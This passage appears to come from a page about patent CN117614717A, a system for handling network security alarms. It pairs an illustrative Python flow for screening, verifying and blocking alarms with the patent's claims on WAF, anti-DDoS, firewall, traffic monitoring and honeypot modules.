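def screen_high_risk(alarms):
    """s2, first half: keep alarms whose attack mode is in the high-risk class."""
    high = []
    for a in alarms:
        if a.attack_type in HIGH_RISK_TYPES:
            a.state = "high_risk"
            high.append(a)
        else:
            a.state = "low_risk"
    return high


def verify(alarm, asset_inventory, internal_prefixes):
    """s2, second half: secondary verification. Assumed rule: the target must be a managed
    asset and the source must not be one of the site's own internal addresses."""
    target_known = alarm.dst_ip in asset_inventory
    source_internal = any(alarm.src_ip.startswith(p) for p in internal_prefixes)
    alarm.state = "to_block" if target_known and not source_internal else "false_positive"
    return alarm.state == "to_block"


def block_cycle(alarms, backends):
    """s3: for every alarm in state 'to_block', push the source address to each blocking back-end."""
    for a in alarms:
        if a.state == "to_block":
            for b in backends:
                b.block(a.src_ip)
            a.state = "blocked"
    return [a.src_ip for a in alarms if a.state == "blocked"]


def create_work_orders(alarms, counter):
    """s4: one work order per alarm, carrying the final handling state, ready for archiving."""
    return [{"id": f"WO-{next(counter):04d}", "device": a.device, "type": a.attack_type,
             "src": a.src_ip, "dst": a.dst_ip, "state": a.state} for a in alarms]


def run_flow(adapters, asset_inventory, internal_prefixes, backends, counter=None):
    counter = counter or itertools.count(1)
    alarms = poll_devices(adapters)
    for a in screen_high_risk(alarms):
        verify(a, asset_inventory, internal_prefixes)
    block_cycle(alarms, backends)
    return alarms, create_work_orders(alarms, counter)


def run_demo():
    """Constructed alarms: two genuine external attacks, one low-risk probe, one alarm caused by
    an internal scanner, and one whose target is not a managed asset."""
    adapters = [
        DeviceAdapter("waf", [Alarm("waf", "sql_injection", "198.51.100.7", "10.1.1.20", 1000, "login form"),
                              Alarm("waf", "scanner_probe", "192.0.2.50", "10.1.1.20", 1001, "robots.txt")]),
        DeviceAdapter("anti_ddos", [Alarm("anti_ddos", "ddos", "203.0.113.9", "10.1.1.30", 1002, "syn flood")]),
        DeviceAdapter("firewall", [Alarm("firewall", "command_execution", "10.9.9.9", "10.1.1.20", 1003, "internal scanner")]),
        DeviceAdapter("traffic_monitor", [Alarm("traffic_monitor", "webshell_upload", "198.51.100.8", "10.1.1.99", 1004, "unknown host")]),
    ]
    backends = [BlockingBackend("boundary_firewall"), BlockingBackend("anti_ddos")]
    alarms, orders = run_flow(adapters, {"10.1.1.20", "10.1.1.30"}, ["10."], backends)
    return alarms, orders, {b.name: b.blocked for b in backends}
```

The secondary verification in s2 is where an automated blocking flow earns its keep: without it, an alarm triggered by the site's own vulnerability scanner would have its address pushed to the boundary firewall. Every alarm, verified or not, still ends in a work order in s4, so false positives remain auditable and the verification rule can be tuned from the archive.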

Claims (8)

1. A network security alarm event-based whole-flow handling system, the system comprising an Api monitoring module, an anti-DDOS module, a firewall module, a WAF module, a flow monitoring module and a honeypot module, characterized in that the Api monitoring module is configured to implement interface availability monitoring, performance monitoring, security monitoring, error monitoring, business logic monitoring and logging and reporting;
the DDOS resistant module is configured to identify, filter, clean, monitor and analyze traffic entering the system in real time, and is responsible for equally distributing traffic among a plurality of servers, and carrying out identity verification and authorization on users;
the firewall module is configured to filter and block packets that do not conform to rules and to examine and filter data above the transport layer;
the WAF module is configured to be responsible for monitoring and analyzing the flow of the Web application program in real time;
the flow monitoring module is configured to acquire data packets from a network and conduct flow behavior analysis;
the honeypot module is configured to simulate loopholes and configuration problems of a real system or an application program, induce an attacker to enter the honeypot system, and then acquire and analyze information of the attack behaviors.
2. The system of claim 1, wherein the Api monitor module comprises an interface availability monitor unit, a performance monitor unit, a security monitor unit, an error monitor unit, a business logic monitor unit, and a first log record unit,
the interface availability monitoring unit is configured to be responsible for periodically checking the availability of the API interface and verifying returned indexes such as state codes, response time and the like;
the performance monitoring unit is configured to be responsible for measuring performance indexes of the API, and simulating and sending requests under different loads so as to evaluate performance bottlenecks and optimization requirements of the API;
the security monitoring unit is configured to be responsible for detecting the security of the API, monitoring malicious behaviors, abnormal requests and potential security vulnerabilities, and providing real-time alarms and logging;
the error monitoring unit is configured to be responsible for monitoring error codes and error messages returned by the API, and checking the error messages in the response of the API so as to discover and process error conditions in time;
the business logic monitoring unit is configured to be responsible for verifying whether the business logic of the API is correct or not, and checking whether the behavior and the result of the API under various input conditions meet the expectations or not;
the first log recording unit is configured to collect, record and analyze API monitored data, generate reports and visual charts, and display the use condition, performance index and fault condition information of the API.
3. The network security alarm event based overall process handling system of claim 1, wherein the DDOS resistant module comprises a first traffic analysis unit, a traffic cleaning unit, a load balancing unit, a first security authentication unit, a defense protocol unit, and a second logging unit,
the first flow analysis unit is configured to be responsible for monitoring and analyzing the flow entering the system in real time, and identifying and recording various types of flow;
the flow cleaning unit is configured to be responsible for filtering and cleaning the flow entering the system, and filtering malicious flow and attack flow from the flow;
the load balancing unit is configured to be responsible for balancing and distributing the flow among a plurality of servers, and dynamically adjusts according to the performance and the load condition of the servers so as to realize fairness of flow distribution;
the first security authentication unit is configured to be responsible for authenticating and authorizing a user to prevent unauthorized access and attack;
the defending protocol unit is configured to be responsible for identifying and preventing various DDOS attack protocols, and detecting and defending attack traffic;
the second logging unit is configured to be responsible for collecting, logging and analyzing DDOS-resistant data.
4. The network-based security alarm event whole process handling system according to claim 1, wherein the firewall module comprises a filtering unit, an application layer proxy unit, a state tracking unit, a VPN unit, an IDS/IPS unit, and a third logging unit,
the packet filtering unit is configured to be responsible for checking network data packets and filtering and preventing data packets which do not accord with rules according to a predefined rule set;
the application layer proxy unit is configured to be responsible for checking and filtering data above a transmission layer, and checking and filtering the transmitted data;
the state tracking unit is configured to be responsible for tracking the state of network connection, filtering and authenticating according to the state, and detecting and preventing unauthorized connection, malicious activity and abnormal behavior;
the VPN unit is configured to be used for establishing and managing secure remote connection, and encrypting and tunneling data by adopting an encryption algorithm;
the IDS/IPS unit is configured to be responsible for detecting and defending intrusion activities, monitoring network traffic and system logs, identifying abnormal behaviors and malicious attacks, and triggering alarms or taking automatic defending measures;
the third logging unit is configured to be responsible for collecting, logging and analyzing firewall data.
5. The network-based security alarm event whole process handling system according to claim 1, wherein the WAF module comprises a second traffic analysis unit, a rule engine unit, a whitelist/blacklist unit, a second security authentication unit, a file upload/download unit, an abnormal behavior detection unit, an API protection unit, and a fourth log record unit,
the second flow analysis unit is configured to be responsible for monitoring and analyzing the flow of the Web application program in real time and analyzing at least parameters, header information and load characteristics in the request;
the rule engine unit is configured to be responsible for checking request and response data according to a predefined rule set, and at least identifying and filtering malicious requests, SQL injection, cross-site scripting attack and file inclusion attack;
the white list/black list unit is configured to be responsible for managing a list which allows or forbids specific IP addresses, users, URL or HTTP methods to access Web application programs;
the second security authentication unit is configured to be responsible for authenticating and authorizing a user to prevent unauthorized access and attack;
the file uploading/downloading unit is configured to be responsible for checking and controlling the safety of file uploading and downloading, detecting the type and the size of the uploaded file and preventing the uploading and the downloading of malicious files;
the abnormal behavior detection unit is configured to detect and prevent malicious behaviors of an attacker;
the API protection unit is configured to be responsible for protecting the API from malicious behaviors and attacks;
the fourth logging unit is configured to be responsible for collecting, recording and analyzing data of the WAF.
6. The network security alarm event based overall process handling system of claim 1, wherein the traffic monitoring module comprises a data collection unit, a third traffic analysis unit, a traffic statistics unit, an alarm and alert unit, a traffic reconstruction unit, a protocol identification unit, a network topology graph unit, and a fifth logging unit,
the data acquisition unit is configured to be responsible for acquiring a data packet from a network and converting the data packet into an analyzable format;
the third flow analysis unit is configured to be responsible for monitoring and analyzing the data packet in real time;
the traffic statistics unit is configured to be responsible for counting and analyzing network traffic, and classifying and aggregating the traffic at least according to time, direction and protocol dimension;
the alarm and alert unit is configured to be responsible for detecting and triggering alarms and alerts;
the flow reconstruction unit is configured to reconstruct and optimize normal network flow so as to reduce the attack effect of an attacker;
the protocol identification unit is configured to perform protocol identification on traffic in network communication;
the network topology map unit is configured to map and manage physical and logical topology maps of a network;
the fifth logging unit is configured for collecting, recording and analyzing data of traffic monitoring.
7. The network security alarm event based whole process handling system according to claim 1, wherein the honeypot module comprises a virtual machine environment unit, a service simulation unit, a threat intelligence unit, a data analysis and alarm unit, an attack recovery and analysis unit, an adaptive honeypot unit, and a crossover honeypot unit,
the virtual machine environment unit is configured to be responsible for creating a virtual machine environment and deploying honeypots therein;
the service simulation unit is configured to be responsible for simulating various network services and deploying forged services in the honeypot so as to attract an attacker to attack;
the threat information unit is configured to be responsible for acquiring and analyzing threat information and updating an attack characteristic library in the honeypot to identify and prevent attacks;
the data analysis and alarm unit is configured to be responsible for monitoring and analyzing data in the honeypot in real time, and recording and reporting an attack behavior when an attacker tries to access the honeypot;
the attack recovery and analysis unit is configured to be responsible for recovering an attack process and analyzing an attack means, and records data traffic and command execution information in the attack process;
the adaptive honeypot unit is configured to simulate vulnerabilities and configuration problems of a real system or application program, and is used for trapping an attacker into the honeypot system and monitoring and analyzing the attack behaviors;
the crossover honeypot unit is configured for trapping and monitoring the activity of an attacker.
8. A network security alarm event based full flow treatment method applied to the treatment system of any of claims 1-7, the method comprising:
polling the security monitoring equipment, including the WAF, the DDOS-resistant equipment, the firewall and the flow monitoring equipment, in turn to obtain the security alarm information;
screening out the high-risk attack alarm information from the security alarm information, performing a secondary verification and analysis of it, and judging whether it is true;
when the high-risk attack alarm information is true, cyclically fetching the attack sources whose state is "to be blocked", executing the blocking operation on the boundary firewall and the DDOS-resistant equipment through the simulator, and blocking the attacking IP;
and generating and archiving a problem work order according to the safety alarm information.
CN202311632947.XA 2023-12-01 2023-12-01 Whole-flow handling system and method based on network security alarm event Pending CN117614717A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202311632947.XA CN117614717A (en) 2023-12-01 2023-12-01 Whole-flow handling system and method based on network security alarm event

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202311632947.XA CN117614717A (en) 2023-12-01 2023-12-01 Whole-flow handling system and method based on network security alarm event

Publications (1)

Publication Number Publication Date
CN117614717A true CN117614717A (en) 2024-02-27

Family

ID=89953132

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202311632947.XA Pending CN117614717A (en) 2023-12-01 2023-12-01 Whole-flow handling system and method based on network security alarm event

Country Status (1)

Country Link
CN (1) CN117614717A (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN117811836A (en) * 2024-02-28 2024-04-02 北京长亭科技有限公司 Traffic forwarding and detecting method and device
CN117811836B (en) * 2024-02-28 2024-05-28 北京长亭科技有限公司 Traffic forwarding and detecting method and device
CN118054973A (en) * 2024-04-11 2024-05-17 国网浙江省电力有限公司桐庐县供电公司 Active defense method, system, equipment and medium based on internet access lock

Similar Documents

Publication Publication Date Title
Pilli et al. Network forensic frameworks: Survey and research challenges
US20030188189A1 (en) Multi-level and multi-platform intrusion detection and response system
US20050216956A1 (en) Method and system for authentication event security policy generation
CN117614717A (en) Whole-flow handling system and method based on network security alarm event
CN112398844A (en) Flow analysis implementation method based on internal and external network real-time drainage data
Beg et al. Feasibility of intrusion detection system with high performance computing: A survey
CN116827675A (en) Network information security analysis system
Kazienko et al. Intrusion Detection Systems (IDS) Part I-(network intrusions; attack symptoms; IDS tasks; and IDS architecture)
Govil et al. Criminology of botnets and their detection and defense methods
Kvarnström A survey of commercial tools for intrusion detection
KR20140078329A (en) Method and apparatus for defensing local network attacks
Limmer et al. Survey of event correlation techniques for attack detection in early warning systems
Pranggono et al. Intrusion detection systems for critical infrastructure
Lindström Next generation security operations center
Bendiab et al. IoT Security Frameworks and Countermeasures
Shyla et al. The Geo-Spatial Distribution of Targeted Attacks sources using Honeypot Networks
Singh et al. Intrusion detection using network monitoring tools
Abdulrezzak et al. Enhancing Intrusion Prevention in Snort System
Fanfara et al. Autonomous hybrid honeypot as the future of distributed computer systems security
Kaur et al. Design & implementation of Linux based network forensic system using Honeynet
Unrein et al. Living in denial-A comparison of distributed denial of service mitigation methods
Shivaprasad et al. Enhancing Network Security through a Multi-layered Honeypot Architecture with Integrated Network Monitoring Tools
CN118054973A (en) Active defense method, system, equipment and medium based on internet access lock
El Hayat Intrusion Detection Systems: To an Optimal Hybrid Intrusion Detection System
Rase et al. Summarization of Honeypot-A Evolutionary Technology for Securing Data over Network, And Comparison with some Security Techniques

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination